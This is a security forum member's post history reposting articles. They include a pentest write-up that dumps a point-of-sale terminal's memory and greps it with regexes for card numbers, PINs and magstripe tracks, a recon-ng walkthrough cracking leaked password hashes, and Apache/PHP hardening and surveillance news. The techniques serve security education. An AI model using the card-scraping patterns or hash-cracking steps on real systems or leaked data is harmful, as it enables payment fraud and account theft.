Posts: 18725 - Days Won: 706

Everything posted by Nytro
-
Bypass Antivirus Dynamic Analysis
Nytro replied to Usr6's topic in Reverse engineering & exploit development
Great. Simple, but effective. -
It doesn't look open-source. Why would TrueCrypt, which is open-source, have a backdoor, while we're supposed to place more trust in a non-open-source "Enterprise" program?
-
What backdoor? For what it's worth, I've looked through its code with exactly that in mind and found nothing interesting.
-
if a girl commits suicide because of me, what happens to me? [no joking]
Nytro replied to EterNo's topic in Discutii non-IT
You can sue her if she threatens you with something like that. I'm serious. It's a form of blackmail, too. -
Video Tutorial: Introduction to Web Application Pen-Testing
Nytro replied to Nytro's topic in Tutoriale video
[h=1]Web Application Pen-Testing[/h]
A YouTube playlist by webpwnized: roughly 60 videos, ranging from short 4-5 minute clips to lectures over an hour long.
PLAYLIST: -
Trolling Memory for Credit Cards in POS / PCI Environments

In a recent penetration test, I was able to parlay a network oversight into access to a point-of-sale terminal. Given the discussions these days, the next step for me was an obvious one: memory analysis. My first step was to drive to the store I had compromised and purchase an item.

I'm not a memory analysis guru, but the memory capture and analysis was surprisingly easy. First, dump memory:

dumpit

Yup, it's that simple. I had the dumpit executable locally by that point (more info here: https://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216). Or, if you don't have keyboard access (dumpit requires a physical "Enter" key; I/O redirection won't work for this):

win32dd /f memdump.img

(from the SANS Forensics Cheat Sheet at https://blogs.sans.org/computer-forensics/files/2012/04/Memory-Forensics-Cheat-Sheet-v1_2.pdf)

Next, I'll dig for my credit card number specifically:

strings memdump.img | grep [mycardnumbergoeshere] | wc -l
171

Yup, that's 171 occurrences in memory, unencrypted. So far, we're still PCI compliant: PCI 2.0 doesn't mention cardholder data in memory, and 3.0 only mentions it in passing. The PCI standard mainly cares about data at rest, which to most auditors means "on disk or in a database", or data in transit, which means on the wire, capturable by tcpdump or Wireshark. Anything in memory, no matter how much of a target in today's malware landscape, has no impact on PCI compliance.

The search above was done in Windows, using strings from Sysinternals; by default this detects strings in both ASCII and Unicode.
If I repeat this in Linux (where strings is ASCII-only by default), the results change:

strings memdump.img | grep [mycardnumbergoeshere] | wc -l
32

To get the rest of the occurrences, I also need to search for the Unicode representations, which "strings" calls out as "little-endian" numbers:

strings -el memdump.img | grep [mycardnumbergoeshere] | wc -l
139

Which gives me the same total of 171.

Back over to Windows, let's dig a little deeper. How about my CC number and my name tied together?

strings memdump.img | grep [myccnumbergoeshere] | grep -i vandenbrink | wc -l
1

Or my CC number plus my PIN (we're CHIP+PIN in Canada):

strings memdump.img | grep [mycardnumbergoeshere] | grep [myPINnumber]
12

Why exactly the POS needs my PIN is beyond me!

Next, let's search this image for a number of *other* credit cards. Rather than dig by number, I'll search for issuer name so there's no mistake. These searches all use the Sysinternals "strings", since that command's defaults lend themselves better to our search:

CAPITAL ONE 85
VISA 565
MASTERCARD 1335
AMERICAN EXPRESS 20

And for kicks, I also searched for debit card prefixes (I only searched for a couple with longer IIN numbers):

Bank of Montreal 500766 245
TD Canada Trust 589297 165

Looking for my number plus my CC issuer in the same line:

strings memdump.img | grep [myccnumbergoeshere] | grep [MASTERCARD] | wc -l

gives me a result of "5". So, assuming that this holds true for others (it might not, even though the patterns are all divisible by 5), this POS terminal has hundreds, but more likely thousands, of valid numbers in memory, along with names, PINs and other information.

Finally, looking for a full magstripe in memory. The search for a full stripe:

grep -aoE "(((%?[bB]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))" memdump.img | wc -l
0

where:
-a = processes a binary file as text
-o = shows only the matched text
-E = treats the pattern as an extended regular expression

Or using this regex to find Track 1 strings only:

((%?[bB]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)

gives us 0 results. Or this regex to find Track 2 strings only:

([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?)

gives us 162 (I'm not sure how much I trust this number).

Anyway, what this tells me is that this store isn't seeing very many folks swipe their cards; it's all CHIP+PIN (which you'd expect). (Thanks to the folks at Bromium for the original regular expressions and breakdown: Understanding malware targeting Point Of Sale Systems | Bromium Labs.)

Getting system uptime (from the system itself) wraps up this simple analysis, the point of this being "how long does it take to collect this much info?"

net statistics server | find "since"

shows us that we had been up for just under 4 days. Other ways to find uptime? From the CLI:

systeminfo | find "Boot Time"

Or, in PowerShell:

PS C:\> Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}}

Or, in wmic:

wmic os get lastbootuptime

Or, if you have Sysinternals available, you can just run "uptime".

What does this mean for folks concerned with PCI compliance? Today, not so much. Lots of environments are still operating under PCI 2.0, and PCI 3.0 simply calls for education on the topic of good coding practices to combat memory scraping. Requirement 6.5 phrases this as "Train developers in secure coding techniques, including how to avoid common coding vulnerabilities, and understanding how sensitive data is handled in memory. Develop applications based on secure coding guidelines."

Personally (and this is just my opinion), I would expect/hope that the next version of PCI will call out encryption of card and personal information in memory specifically as a requirement. If things play out that way, what this will mean to the industry is that either:
a/ folks will need to move to card readers that encrypt before the information reaches the POS terminal, or
b/ if they are using this info to collect sales/demographic information, they might instead tokenize the CC data for the database and scrub it from memory immediately after. All I can say to that approach is "good luck". Memory management is usually abstracted from the programming language, so I'm not sure how successful you'd be in trying to scrub artifacts of this type from memory.

===============
Rob VandenBrink, Metafore

Source: https://isc.sans.edu/forums/diary//18579
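For anyone who wants to replay the Track 2 hunt without a real dump, here is a minimal sketch against a synthetic file; the file contents and the test PAN 4111111111111111 (a well-known test number, not a real card) are made up for illustration, and the regex is the Track 2 pattern quoted above:

```shell
# Build a throwaway "memory dump" containing one synthetic Track 2 string.
dump=$(mktemp)
printf 'log noise 4111111111111111=2512101000000000? more noise\n' > "$dump"

# Track 2 pattern from the article: PAN, '=', YYMM expiry, discretionary data, '?'
track2='[0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?'

# -a: treat binary as text, -o: print only the match, -E: extended regex
grep -aoE "$track2" "$dump"
```

On a real image you would point the same command at memdump.img and pipe to wc -l, exactly as in the searches above.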
-
[h=1]OWASP A6 – Security Misconfiguration with PHP[/h]
By codewatch, November 20, 2011

This will be another non-development-related post. I am going to cover security configuration of the operating system, web server, and PHP environment for your web applications. It doesn't matter how secure your application is if the OS, web server, or PHP configuration is insecure. I am not going to cover full hardening of your servers, but rather some general guidelines along with some specific configuration settings for PHP and Apache.

General guidance on server deployment for your application environment:
- Apply all security-related patches to the operating system and services in use. Make sure that Apache and PHP are fully patched.
- Apply a security best-practice standard, deviating only when necessary. CIS is a good choice here because of the depth of their configuration standards. Use security best-practice standards for the OS as well as Apache.
- Change default passwords for all accounts. Use a long and strong password for service and administrative accounts.
- Disable or remove all unnecessary protocols, accounts, scripts, processes, and services.
- Perform vulnerability scans, web application scans, and network- and application-level penetration tests against your systems on a regular basis.
- Configure servers to log all security-related events and to forward those events to a centralized security information management system.
- Configure applications to display only generic error messages.
- Perform administrative actions using unprivileged accounts. Use the "Run As" feature of Windows or the sudo feature of Linux to perform privileged operations on servers.

The above suggestions will help ensure that your system is patched and the OS is configured securely. Apache must be configured securely as well to limit the server's exposure to risk.

General Apache recommendations:
- Compile Apache with the minimum set of modules and features required to run your application(s).
I suggest at least the following flags be passed to configure: --enable-headers, --enable-expires, --enable-ssl, --enable-rewrite, --disable-status, --disable-asis, --disable-autoindex, --disable-userdir. The enable flags ensure that you can configure the server to time out sessions and send other security-related responses, support connections over SSL, and rewrite requests to prevent specific HTTP methods. The disable flags prevent information disclosure issues within the Apache web server.
- Remove all default scripts from the /cgi-bin directory.
- Create an apache user and group with minimal permissions. Run Apache as this user and change ownership of all files served by Apache to this user and group with minimal permissions (in Linux: chown -R apache.apache /path/to/web/directory, then chmod -R 644 /path/to/web/directory, then chmod 744 for all directories under the web directory).
- Consider installing and configuring ModSecurity.

Specific Apache web server configuration suggestions follow.
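The ownership and permission recipe above can be sketched end to end. This is a runnable illustration against a throwaway demo directory, not a real web root; the real chown step needs root and is left as a comment:

```shell
# Demo stand-in for /path/to/web/directory (hypothetical layout).
WEBROOT=$(mktemp -d)
mkdir -p "$WEBROOT/app"
touch "$WEBROOT/app/index.php"

# On a real server, as root: chown -R apache:apache "$WEBROOT"

# Regular files: read/write for the owner, read-only for everyone else (644).
find "$WEBROOT" -type f -exec chmod 644 {} +
# Directories: rwx for the owning apache user only (744, per the text above).
find "$WEBROOT" -type d -exec chmod 744 {} +

stat -c '%a %n' "$WEBROOT/app" "$WEBROOT/app/index.php"
```

Using find with -type keeps the file and directory modes separate, which a single recursive chmod cannot do.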
Configure httpd.conf so that the server doesn't report full version and module information:

ServerTokens Prod
ServerSignature Off

Configure the server to use an unprivileged user account and group:

User apache
Group apache

Load the fewest modules possible for your environment; our server is set to:

LoadModule php5_module /usr/modules/libphp5.so
LoadModule security2_module /usr/modules/mod_security2.so
LoadModule unique_id_module /usr/modules/mod_unique_id.so

Disable the use of unnecessary and potentially dangerous HTTP/WebDAV methods:

<Directory />
<Limit OPTIONS PUT CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK DELETE TRACK>
Order deny,allow
Deny from all
</Limit>
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>

<Directory "/var/www/htdocs">
<Limit OPTIONS PUT CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK DELETE TRACK>
Order deny,allow
Deny from all
</Limit>
Options None
AllowOverride None
Order allow,deny
Allow from all
</Directory>

Disable support for all but specifically allowed file extensions:

# Match all files and deny
<FilesMatch "^.*\.[a-zA-Z0-9]+$">
Order deny,allow
Deny from all
</FilesMatch>
# Allow specific file extensions
<FilesMatch "^.*\.(ico|css|tpl|wsdl|html|htm|JS|js|pdf|doc|xml|gif|jpg|jpe?g|png|php)$">
Order deny,allow
Allow from all
</FilesMatch>

Log errors:

ErrorLog "/var/log/apache/error_log"
LogLevel notice
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
CustomLog "/var/log/apache/access_log" combined

Disable access to the cgi-bin directory:

<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order deny,allow
Deny from all
</Directory>

Block the TRACE and TRACK HTTP methods (must be added to each virtual host):

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

Block anything other than HTTP/1.1 traffic:

RewriteCond %{THE_REQUEST} !HTTP/1\.1$
RewriteRule .* - [F]

Applications that require authentication should require SSL for the entire session. The following configuration will redirect requests for http://myapp.mysite.com to HTTPS:

RewriteCond %{HTTPS} off
RewriteRule (myapp.mysite.com.*) https://%{HTTP_HOST}%{REQUEST_URI}

In your SSL configuration file, require SSLv3 or TLS and only strong cipher suites:

SSLProtocol -ALL +SSLv3 +TLSv1
SSLCipherSuite HIGH:!ADH

If you cannot use the --disable-userdir and --disable-status options during Apache compilation, add the following directives to your Apache configuration to prevent unnecessary information disclosure related to these modules:

UserDir Disabled
ExtendedStatus Off

If you cannot use the --disable-autoindex option during Apache compilation, add the following directive to each <Directory> section in your Apache configuration to prevent auto-indexing of directories and leakage of directory contents:

Options -Indexes

Finally, PHP must be configured securely to ensure the protection of your application and company/customer data.

General PHP recommendations:

- Compile PHP with the minimum number of modules and features required to run your application(s). I suggest at least the --with-openssl and --with-mcrypt configure options. This will ensure that you can leverage encryption routines within your application to protect data and passwords.
- Protect the PHP session directory. Place session data in a temporary directory and then apply the most restrictive permissions possible to the folder. The folder can be owned by the root user and the apache group.
- Place third-party PHP libraries used within your applications in a directory outside of the main web directory (/htdocs).
- If possible, apply the Suhosin patch to PHP to provide additional security to the scripting-language core.

Specific PHP configuration suggestions follow.
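The php.ini values that follow can be spot-checked the same way as the Apache settings. A rough Python sketch (hypothetical helper, not part of PHP or any official tool; the checked keys are an assumed subset of the settings covered in this post) that parses key = value lines and reports deviations:

```python
# Recommended values for a few php.ini settings discussed in this post.
WANTED = {
    "display_errors": "Off",
    "allow_url_include": "Off",
    "session.cookie_httponly": "true",
}

def parse_php_ini(text):
    """Parse 'key = value' lines, ignoring ';' comments and blanks."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";")[0].strip()
        if "=" in line:
            key, _, value = line.partition("=")
            settings[key.strip()] = value.strip().strip('"')
    return settings

def audit_php_ini(text):
    """Map each deviating key to the value found (None if absent)."""
    settings = parse_php_ini(text)
    return {key: settings.get(key)
            for key, wanted in WANTED.items()
            if settings.get(key) is None
            or settings.get(key).lower() != wanted.lower()}

sample = "display_errors = On\nallow_url_include = Off\n"
print(audit_php_ini(sample))
```

For the sample above, display_errors is flagged because it is On, and session.cookie_httponly is flagged because it is absent.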
Configure php.ini to prevent denial-of-service (DoS) conditions (adjust these settings based on the needs of your application):

; Maximum time a script can execute
max_execution_time = 30
; Maximum time a script can spend parsing request data
max_input_time = 7200
; Maximum memory a script can consume
memory_limit = 128M
; Limit the amount of data that can be POSTed to the
; server. This affects file uploads as well.
post_max_size = 4M
; Limit the maximum size of a file uploaded to the server.
upload_max_filesize = 4M
; Limit the number of files that can be uploaded at a
; single time.
max_file_uploads = 10

Enable logging but disable displaying errors to application users:

error_reporting = E_ALL & ~E_DEPRECATED
display_errors = Off
display_startup_errors = Off
log_errors = On
log_errors_max_len = 1024
; Do not ignore errors; log them all
ignore_repeated_errors = Off
ignore_repeated_source = Off

Set specific MIME types and content types to help prevent encoding, decoding, and other canonicalization issues that can result in successful XSS attacks:

default_mimetype = "text/html"
default_charset = "ISO-8859-1"

Place third-party PHP applications in a path outside of the /htdocs directory:

include_path = ".:/usr/local/apache/phpincludes"

Implement strong protection of PHP sessions:

; Save sessions as files in a specific directory
session.save_handler = files
session.save_path = "/tmp/phpsessions"
; Require the use of cookies to prevent session
; IDs from being included in URLs
session.use_cookies = 1
session.use_only_cookies = 1
session.use_trans_sid = 0
; Set the "secure" and "httponly" flags on the
; cookie. This will prevent the cookie from
; being sent over an HTTP connection or being
; accessed by JavaScript, helping prevent
; session-hijacking attacks via XSS.
session.cookie_secure = true
session.cookie_httponly = true
; Set cookie path and domain information to
; limit where the cookie can be used, thus
; protecting session data.
session.cookie_path = /codewatch/
session.cookie_domain = www.codewatch.org
; Set the cookie to be deleted once the browser
; is closed.
session.cookie_lifetime = 0
; Perform garbage collection on session data
; after 15 minutes of inactivity.
session.gc_maxlifetime = 900
; Use a secure source for generating random
; session IDs (set to a non-zero value
; on Windows systems).
session.entropy_file = /dev/urandom
; Use a strong hashing algorithm to create
; the session ID and use as many characters
; as possible to reduce the likelihood that
; the session ID can be guessed or hijacked.
session.hash_function = 'sha512'
session.hash_bits_per_character = 6
; Send the nocache directive in HTTP(S)
; responses to ensure the page can't be
; cached. In addition, set the time-to-live
; for the page to a low value.
session.cache_limiter = nocache
session.cache_expire = 15

Disable the ability for PHP to interpret a URL as a file, to help prevent some types of remote file include attacks:

allow_url_fopen = Off
allow_url_include = Off

Disable registration of globals, long arrays, and the argc/argv variables (more information and the reasons behind this suggestion can be found here, here, and here):

register_globals = Off
register_long_arrays = Off
register_argc_argv = Off

Following these guidelines and configuration settings should go a long way towards ensuring the security of your web and application servers, company and customer data, and the integrity of your systems.

Sursa: https://www.codewatch.org/blog/?p=190
-
[h=3]"Cracking" Hashes with recon-ng and bozocrack[/h]

The other day I came across a database dump that had user login names and hashed passwords. I had over 1,000 of them, and they were SHA256 hashes. I remembered that there was some tool that could perform Google look-ups for hashes and asked the Twitter-verse for help. Wouldn't you know that the first person to reply was Tim Tomes, who said that the bozocrack module inside recon-ng could do exactly what I wanted. Excellent! This blog post is a walk-through of that process.

[h=3]Pulling our Hashes from a File[/h]

First thing we need to do is get the hashes. Let's say I have all my hashes in a file called, oh I don't know, "hashes" and I'll put them on the Desktop of my Kali Linux system. So the file will be located at /root/Desktop/hashes.

Launch recon-ng and create a workspace named "hashes" (or whatever you want) for this work. Workspaces allow us to logically partition our work so that if we have several projects or customers that we are doing work for simultaneously, their data doesn't get co-mingled.

[Image: recon-ng launched from inside a terminal]

Now let's tell recon-ng to load the bozocrack module. Since it is the only module with "bozo" in it, we can use a shortcut and just type load bozo as shown below. I also used the show info command to get information about the module I just loaded.

[Image: Loading the bozocrack module and showing the info]

The important part of this step is to see all of the options that you can configure. In this case the SOURCE variable is the only option to modify. By default, the module pulls information from the credentials table inside the recon-ng database.
But we can tell it to use a different location as the source of our hashes. Let's do that first. We know from above that our file with the hashes is at /root/Desktop/hashes. We change where the module looks for the source using the set command: set SOURCE /root/Desktop/hashes (as shown below).

[Image: All set to run the bozocrack module using the hashes file]

At this point, we just type run and grab a $cold_beverage. The module will make Google queries for each hash in the file you specified and it'll display the results on the screen. Below is what mine looked like once it finished.

[Image: bozocrack module output]

You can see that the hashes it found a match for start with a green "splat"/asterisk [*]. Also note that there were three types of hashes in my file: MD5, SHA1, and SHA256. Pretty cool that the module just took them all and didn't make me separate them into separate files. +1 for recon-ng.

So that is the easy way of doing the lookups. You can easily scrape the terminal window and copy all the found hashes into a text editor for post-processing. That works... but I'm a lazy guy. I like to have my tools do the work. So let's do it another way too.

[h=3]Using the Internal DB[/h]

As I mentioned above, recon-ng maintains a database for its findings. To see all the tables and such, type show schema and they will appear. We are going to be storing our password hashes in the hash column of the credentials table. First thing I do is to import all my hashes into the DB using the import/csv_file module. Just type use import/csv and hit enter (since csv_file is the only module with "csv" in it inside the import path, you don't have to complete the whole name. Like I said, I'm lazy!).
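As an aside, the Google-lookup trick described above is simple at its core: a bozocrack-style tool infers the algorithm from the hex digest length (32 characters for MD5, 40 for SHA1, 64 for SHA256), Googles the hash, then re-hashes candidate words from the results until one matches. A toy Python version of the identify-and-verify step (illustrative only -- this is not recon-ng's actual code, and the Google query itself is omitted):

```python
import hashlib

# Hex-digest length -> likely algorithm, which is how a mixed file of
# MD5/SHA1/SHA256 hashes can be handled without pre-sorting.
ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}

def identify(hexhash):
    """Guess the hash algorithm from digest length (None if unknown)."""
    return ALGO_BY_LEN.get(len(hexhash))

def verify(hexhash, candidates):
    """Return the candidate word whose hash matches, or None."""
    algo = identify(hexhash)
    if algo is None:
        return None
    for word in candidates:
        if hashlib.new(algo, word.encode()).hexdigest() == hexhash.lower():
            return word
    return None

# 5f4dcc3b5aa765d61d8327deb882cf99 is the well-known MD5 of "password".
print(identify("5f4dcc3b5aa765d61d8327deb882cf99"))  # md5
print(verify("5f4dcc3b5aa765d61d8327deb882cf99", ["secret", "password"]))  # password
```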
Again, I like doing a show info to see what options there are.

[Image: Import/csv_file module]

OK, so we need to set the FILENAME option (set FILENAME /root/Desktop/hashes) and also the TABLE (set TABLE credentials). Now that we have those fields entered, if we do another show info we can see that there is now another option to change. See the "CSV_####..." column in the picture below? recon-ng is telling us it found content and wants to know where to put it. So we type set CSV_[ENTERTHENUMBER] hash as shown below.

[Image: Import/csv_file module with column recognized]

Now we have to go back to the bozocrack module (load bozocrack). Since we already ran the module using a file as the SOURCE, we'll need to switch the SOURCE back to the default (set SOURCE default), as the default uses the contents of the DB. Oh, want to check if your hashes loaded OK? Type show credentials and you'll see the hashes in their proper column (below).

[Image: Credentials table before bozocrack]

OK, let's kick this off using the run command and let 'er rip. We will see the same output as when we ran the bozocrack module above, but this time the module will store the results in the DB. To show this, just type show credentials again and you should see more of the columns filled out (like the pic below).

[Image: Credentials table after bozocrack]

Yay! We got them in the DB, but how do we get them out?
Of course there is a module for that. Type load reporting/csv to load that module. show info will tell you what options there are. We see (below) that we need to set the FILENAME (set FILENAME /root/Desktop/recon-ng_hashes_out) and TABLE (set TABLE credentials) and then type run. Magic!

[Image: Using the reporting/csv output module]

On your desktop should be a CSV file with your hashes, what type of hashes they are, and the cleartext passwords (like the one below).

[Image: Exported CSV report from recon-ng]

Hope this was helpful!

Sursa: Hacking and Hiking: "Cracking" Hashes with recon-ng and bozocrack
-
[h=1]Pastebin Pastes Collection[/h]

[h=1]This Just In (more)[/h]

Pastebin.com scraped pastes 2014-07-01 (57 days ago)
Pastebin.com scraped pastes 2014-06-30 (58 days ago)
Pastebin.com scraped pastes 2014-06-29 (59 days ago)
Pastebin.com scraped pastes 2014-06-28 (60 days ago)
Pastebin.com scraped pastes 2014-06-27 (61 days ago)

Maybe you'll find something interesting.

Sursa: https://archive.org/details/pastebinpastes
-
[h=2]How your cat could be used to hack neighbors' Wi-Fi[/h]

Wednesday - 8/13/2014, 8:50am ET
By Neal Augenstein

WASHINGTON -- Coco looks and acts like a cat -- and hackers could exploit that.

Gene Bransfield, a principal security engineer at Tenacity Solutions, Inc., in Reston, Virginia, outfitted the Siamese cat with a custom-made collar that mapped dozens of neighbors' Wi-Fi networks. As reported in Wired, Bransfield outfitted a cat collar with a Spark Core chip loaded with his custom-coded firmware, a Wi-Fi card, a tiny GPS module, and a battery.

The customized collar allowed Bransfield to map all the Wi-Fi networks in the neighborhood, which could also be done by a home intruder or a person intent on stealing a home's Wi-Fi. The project was jokingly entitled "War Kitteh," and Bransfield's presentation at last weekend's DefCon hacker conference in Las Vegas was entitled "How to Weaponize Your Pets."

Bransfield says his goal wasn't to create dangerous house pets, but to make users aware of privacy issues and entertain the conference's hacker audience. "My intent was not to show people where to get free Wi-Fi," says Bransfield, "but the result of this cat research was that there were a lot more open and WEP-encrypted hot spots out there than there should be in 2014."

[h=3]Updating an old hacking technique[/h]

In the 1980s, hackers looked for unprotected computers by "wardialing" -- cycling through numbers with their modems. After the advent of Wi-Fi, "wardriving" saw hackers attaching an antenna to a car and driving through the city looking for weak and unprotected networks.

Bransfield says he built the "War Kitteh" collar for less than $100, and it became easier in the past months, when the Spark Core chip became easier to program, Wired reports. Bransfield doesn't own a cat. Coco is his wife's grandmother's cat.
In a three-hour walk through the neighborhood, Coco found 23 Wi-Fi hot spots, more than one-third of which were open to snoops, with the simpler-to-crack WEP instead of the more modern WPA encryption. Bransfield says many of the WEP connections were Verizon FiOS routers with their default settings left unchanged.

Sursa: How your cat could be used to hack neighbors' Wi-Fi - WTOP.com
-
[h=1]Critical Bug Combo in New Google Chrome 37 Stable Earns Researcher $30,000 (€22,750)[/h]

August 26th, 2014, 20:59 GMT · By Ionut Ilascu

Google promoted its Chrome browser to a new stable revision, 37.0.2062.94, which integrates a total of 50 security fixes; one of the bug hunters received a $30,000 / €22,750 reward for disclosing a combination of vulnerabilities that led to remote code execution outside the sandbox.

The bug hunter, identified as lokihardt@asrt, found glitches in V8 (Chrome's JavaScript engine), inter-process communication (IPC), the data synchronization component, and extensions, which combined gave a potential attacker the possibility to run arbitrary code on the targeted machine.

Apart from this reward, Google also paid $13,000 / €9,850 to other researchers for use-after-free vulnerabilities in DOM, SVG and bindings, spoofing of the extension permission dialog, uninitialized memory reads in WebGL and Web Audio, and an issue related to extension debugging.

An additional $8,000 / €6,065 was paid by the company to researchers who worked with the Chrome development team on making sure that some security bugs never made it into the stable version of the web browser. Google's own security team also discovered glitches based on internal audits, fuzzing, and other types of activities. The AddressSanitizer tool, a memory error detection utility, was used for the discovery of many of the security bugs fixed in this revision.

Sursa: Critical Bug Combo in New Google Chrome 37 Stable Earns Researcher $30,000 (€22,750)
-
Beantown's Big Brother: How Boston Police Used Facial Recognition Technology to Spy on Thousands of Music Festival Attendees

Longreads Or Whatever
By Luke O'Neil

Although we look back on it now through a mournful or angry lens, it's easy to forget just how downright disorienting the days and weeks following the Boston Marathon bombing in April of 2013 were. Adding to the surrealism of the drama for me was a night spent on lockdown in my Watertown home while the gun fight between authorities and the alleged bomber raged on blocks away, and the intrusion of heavily armed law enforcement trampling through my front yard during the next morning's manhunt. For weeks after in the city, riding the subway or at any sort of big event, a sense of unease would sneak up on me from time to time when I realized just how easy it would be for something like the bombing to happen again.

You might forgive someone attending the Boston Calling music festival at Government Center about a month later, a now twice-yearly, extremely successful event, for feeling somewhat apprehensive. It was, after all, the first large gathering of thousands of spectators since the bombing. But, as a recent investigation published in the alt-weekly Dig Boston has uncovered, perhaps concertgoers like myself needn't have worried so much; after all, the city was watching our every movement.

I remarked at the time, in writing reviews of the concert in May, as well as of the follow-up that took place in September, just how refreshing it was to experience a large-scale music festival like this in the heart of the city without an overbearing security presence. Yes, there were bag checks, and police stationed throughout, but at nowhere near the high-alert-style numbers you might have expected. Instead of feeling unsafe, the resumption of something resembling normal life without an overreactive, militarized-style doubling-down was liberating.
It felt like the city was treating us like adults, which, as anyone who's been to big concerts or sporting events around here will tell you, isn't necessarily the normal routine. As a music critic who typically avoids festivals at all costs, it was a big part of what made me able to enjoy myself at this one in particular.

One of the reasons for a less physically imposing police presence may have been that the city was in the process of testing a pilot program for a massive facial recognition surveillance system on everyone at the concerts in both May and September. Using software provided by IBM that utilized existing security cameras throughout the area, the city tracked the thousands of attendees at the concert and in the vicinity, and filtered their appearance into data points which could then be cross-checked against certain identifying characteristics. And then... well, what happens next is what makes this sort of thing so potentially troubling.

Slides provided to me by the Dig's Chris Faraone show how the system was meant to work, with the software capable of distinguishing people by such characteristics as baldness, eyeglasses, skin tone, torso texture, and beards, which, considering this was an indie rock concert, may have overloaded their servers. The data would then be transmitted to a hub, where city representatives, Boston Police, and IBM support staff could watch in real time, all while simultaneously monitoring social media key words related to the event.
The purpose, ostensibly, was being able to pick up on suspicious activity as it was happening, for example "alerting when a person loiters near a doorway as they would if trying to gain entrance," the slides explain, or alerting of "attempts to climb perimeter barricade," or an "abandoned object near barricade." These seem like worthwhile things to be on the lookout for, but among the capabilities was one that seems particularly egregious and questionably necessary: "Face Capture of every person who approaches the door."

[Image: From IBM's PowerPoint document on facial recognition analytics.]

The Boston Police Department denied having had anything to do with the initiative, but images provided to me by Kenneth Lipp, the journalist who uncovered the files, show Boston police within the monitoring station being instructed on its use by IBM staff.

The implementation of such a system so closely following the bombings may seem arguably justified, but it's important to remember just how much was made of facial recognition software's ineffectiveness when it came to identifying the bombers Tamerlan and Dzhokhar Tsarnaev themselves. Despite the fact that both men's images were captured on security cameras on the day of the bombing, and that their identities were known to law enforcement, the technology was incapable of coming up with a match. "The technology came up empty even though both Tsarnaevs' images exist in official databases: Dzhokhar had a Massachusetts driver's license; the brothers had legally immigrated; and Tamerlan had been the subject of some FBI investigation," the Washington Post reported at the time.

Instead, it was traditional police work, eyewitnesses, tips from people who recognized them and so on, that gave the police and federal agents the information they needed. So what made the city think things would be any different this time?
The shortcomings of facial recognition software of the kind being tested at Boston Calling, and implemented in other cities throughout the world, notably in New York City post-9/11 and everywhere throughout London, not to mention increasingly in retail stores throughout the country, are well documented. Too often, the images captured are rendered less effective by different facial expressions, facial hair, hats, the angle at which they were taken, and so on. Face painting, interestingly, has also been shown to stymie cameras, something that might be a particular issue at music festivals like this one, where costume trappings have become standard.

[Image: Surveillance footage, courtesy of Kenneth Lipp at Dig Boston.]

"This is definitely not the first time that government and private actors have worked together to use people attending an event like that as guinea pigs," Kade Crockford, the Director of the ACLU of Massachusetts Technology for Liberty Project, told me. She likens the image capturing going on at the concerts here to a similar story uncovered by The Intercept recently that showed 15 states, including Massachusetts, have been sharing driver's license images and data with federal agencies to fill up their already massive terror database and watch lists.

Despite the fact that the technology is still imperfect, most observers agree there is going to come a point soon where it does work -- a project in the works from researchers at Facebook has shown that it can match two facial images with 97.25% accuracy, a fraction smaller than the normal human brain can do, for example. It's imperative we start worrying about what governments can and will do with that capability when the time comes. "It's going to get better and better. As it does, it's not just the FBI, CIA, and government agencies, but also every shopping mall you go into, potentially sports arenas," Crockford says.
"It's going to look a lot like dystopian scenes in the mall in the film Minority Report." Like in so many other areas, the technology here is moving faster than the legislature and the courts. "We really need to get a handle on what exactly government agencies are doing. Not just thinking about it, but actually acting on public concerns about how this technology is going to be used against us, and actually passing laws that restrict some of the ways."

It's important to point out that none of this would've even come to light if not for the sleuthing of the reporters at the Dig, including Lipp, who stumbled across the IBM documents and agreements with the City of Boston on how to implement the software on an unsecured server left out in the open by an IBM employee. He's found similar troves of information regarding programs like these in Chicago and New York City, and evidence of IBM instituting similar programs in Scotland, Israel, Puerto Rico, Pakistan, and New Jersey.

"In the case of Boston, what's very concerning is how recklessly they tested something on the public carte blanche, predicated on this Never Forget thing, post-9/11 thing," Lipp says. "The really disturbing thing to me is that all of this is being ushered in under the umbrella of Smart Cities. What it means to me is cities using integrated surveillance, having tech partners that establish themselves as contractors in the city by putting their hardware in the infrastructure. Once they have infrastructure in place, they can apply any of the software they want to it."

When reached for comment, Boston Calling explained their involvement with the program: "City of Boston public safety officials contacted us in advance of our May 2013 festival to tell us they would be testing a new surveillance system as an extra safety measure. Boston Calling Music Festival was not involved in the implementation of the program. Our practice is to comply with all public safety initiatives the city chooses to implement.
Fan safety is our number one priority."

In the demonstration for Boston there were "only" 13 cameras used, but there were 200 they could have brought online. Even worse is what happened to the data after the project was complete. The mayor's office, who haven't responded to my requests for comment, released a statement admitting to the program. (The program was conducted under former mayor Tom Menino's administration, not recently elected Martin Walsh's.)

